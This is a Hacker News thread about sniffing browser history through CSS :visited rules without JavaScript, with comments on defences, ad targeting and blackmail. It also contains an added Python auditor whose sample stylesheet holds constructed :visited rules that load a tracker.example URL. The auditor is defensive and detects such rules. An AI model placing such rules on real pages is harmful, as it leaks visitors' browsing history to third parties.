
Sniffing Browser History with No Javascript - vaksel
http://www.making-the-web.com/misc/sites-you-visit/nojs/
======
sdt
You can protect yourself against this by disabling a:visited. Here's a Firefox
plugin that does it intelligently, without breaking the functionality on sites
where you actually clicked a link.

<http://safehistory.com/>

------
tptacek
This shouldn't be news, since nothing about the original flaw --- which is
_years_ old --- involved Javascript.

~~~
axod
Also, this exact method (css background) was mentioned last time the js
version came up on hacker news. How many more times will this be posted?

~~~
Tichy
I seem to have missed all the previous times it was posted :-(

I am surprised that the browser tries to be smart about loading images defined
in the CSS.
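
The method discussed in this subthread relies on a `:visited` rule that points at an image, which the browser requests only for links it finds in its history. As an added example (not code from the linked demo or from any commenter), here is a small Python check that flags such rules when auditing a stylesheet; the sample CSS and the `tracker.example` host are constructed.

```python
import re

# Constructed sample stylesheet (not taken from the linked demo page).
SAMPLE_CSS = """
a:link { color: #00c; }
a:visited { color: #609; }               /* harmless: colour only */
#l1:visited { background: url(http://tracker.example/hit?site=1); }
ul li a.probe:visited span { background-image: url('/log.php?id=42') }
a:hover, #l2:visited { list-style-image: url("//tracker.example/b.gif"); }
.banner { background: url(/img/banner.png); }
"""

COMMENT = re.compile(r"/\*.*?\*/", re.S)
# Innermost "selectors { declarations }" blocks, so rules nested in @media match too.
RULE = re.compile(r"([^{}]+)\{([^{}]*)\}")
URL = re.compile(r"url\(\s*['\"]?([^'\")]+)['\"]?\s*\)", re.I)


def find_visited_fetches(css):
    """Return (selector, property, url) for each declaration that makes the
    browser fetch a resource only when a link matches :visited."""
    findings = []
    for selectors, body in RULE.findall(COMMENT.sub("", css)):
        visited = [s.strip() for s in selectors.split(",")
                   if ":visited" in s.lower()]
        if not visited:
            continue
        # Simplification: splitting on ';' would mis-split data: URIs.
        for decl in body.split(";"):
            prop, sep, value = decl.partition(":")
            if not sep:
                continue
            for url in URL.findall(value):
                for sel in visited:
                    findings.append((sel, prop.strip().lower(), url.strip()))
    return findings


if __name__ == "__main__":
    for sel, prop, url in find_visited_fetches(SAMPLE_CSS):
        print(f"{sel!r} loads {url!r} via {prop}")
```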

------
paraschopra
Great, but I would be really interested if someone could demonstrate an
application deriving some real world use out of this information. Seen many
demos of this browser sniffing but is anyone using it for real?

~~~
vaksel
It could be useful in targeting ads, i.e. tracking users' other website habits
to show them much more relevant ads.

Let's say HN has ads. And it sees that you just came from a Python tutorial
site. Instead of showing you a random programming book, the ad would show you
a series of Python books.

~~~
tptacek
Let's say you're a staffer for a Republican congressman, and I'm an innocuous
web page you've visited. Oh, look! You've visited a lot of gay pornography
sites! I think I'd like you to start paying me $50 a month now, so I can
"protect" you from negative publicity.

~~~
johnnybgoode
Because a Democratic congressman wouldn't have any political problems
whatsoever if found to have visited gay porn sites. :)

~~~
tptacek
I didn't give much thought to this example but I think it makes the point OK.

------
jrockway
If you're upset about this, wait until you hear about Google Analytics...

------
jorgem
It'd be nice if NOSCRIPT could have an option like: "Don't share my browser
history with this site". If that option were on, the page just wouldn't have
any 'visited' links at all. I could live with that.

~~~
Sephr
There already is a Firefox plugin for that (<http://safehistory.com/>).
NoScript, unsurprisingly, is only for _JavaScript_.

------
Sephr
This inspired me to take the concept even further:
<http://news.ycombinator.com/item?id=655101>

This will only work in Opera and Gecko-based browsers.

------
Pistos2
Isn't the utility of the technique watered down by the fact that the attacker
has to precompile a list of addresses? Anything not in that list won't be
mined.

~~~
tptacek
Great, so now there's recurring revenue in it for the business that sells
subscriptions to targeted lists.

------
knowtheory
So... this browser thing, actually -is- gathering analytics from anyone who
visits it. :P

------
radu_floricica
Apparently it crashes Chrome.

~~~
username
No crash on Chrome 2 here.

